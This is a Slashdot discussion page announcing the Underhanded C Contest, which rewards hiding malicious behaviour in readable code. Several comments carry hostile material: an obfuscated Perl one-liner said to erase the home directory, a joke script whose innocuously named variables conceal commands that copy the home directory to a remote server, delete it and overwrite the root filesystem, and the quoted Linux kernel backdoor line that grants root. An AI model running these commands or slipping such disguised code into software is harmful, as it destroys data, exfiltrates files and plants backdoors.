Slashdot Mirror

← Back to Stories (view on slashdot.org)

The First Annual Underhanded C Contest

Posted by CowboyNeal on from the delightfully-malicious dept.

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

4 of 341 comments (clear)

  1. Re: This year's challenge by ErichTheWebGuy · · Score: 4, Informative

    Any open-source steganography programs

    Why, yes! http://sourceforge.net/projects/steghide/

    --
    bash: rtfm: command not found
  2. Re:Seems a bit like those hacking contests by numbski · · Score: 5, Informative
    This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
    Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

    I mean I could do something like this:

    # When do you want it done?
    $today="sudo";
    $yesterday="su -c";

    # Define our globals
    $superman="ls";
    $wonderwoman="rm"
    $batm an="cp";
    $aquaman="mv";

    #define some important flags
    $blows="-r";
    $maims="-p";
    $chunks="-f";
    $defeats="-s";

    #define some targets
    $your_mom="/";
    $your_dad="/usr";
    $your_ sister="~";
    $your_teacher="/bin";
    $hell="/dev/nu ll";
    $heaven="/dev/random";
    $skyhigh="nfs://myse rver/myhome";

    #....later, back at Superfriends Headquarters

    `$batman $blows $your_sister $skyhigh`;
    `$wonderwoman $blows $chunks $on $your_sister`;
    `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
    #Would you like to see the rest of the story?
    #print "Would you like to hear more? Please type your password to continue!";

    The superfriends save the day again.
    --

    Karma: Chameleon (mostly due to the fact that you come and go).

  3. Linux Kernel Backdoor Attempt by Johnny+Hardcore · · Score: 5, Informative

    This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).

  4. Service Pack fixes it, but it's documented by edalytical · · Score: 4, Informative

    http://support.microsoft.com/?kbid=311486

    --
    Win a signed Stephen Carpenter ESP Guitar from the Deftones: http://def-tag.com/?r=0008781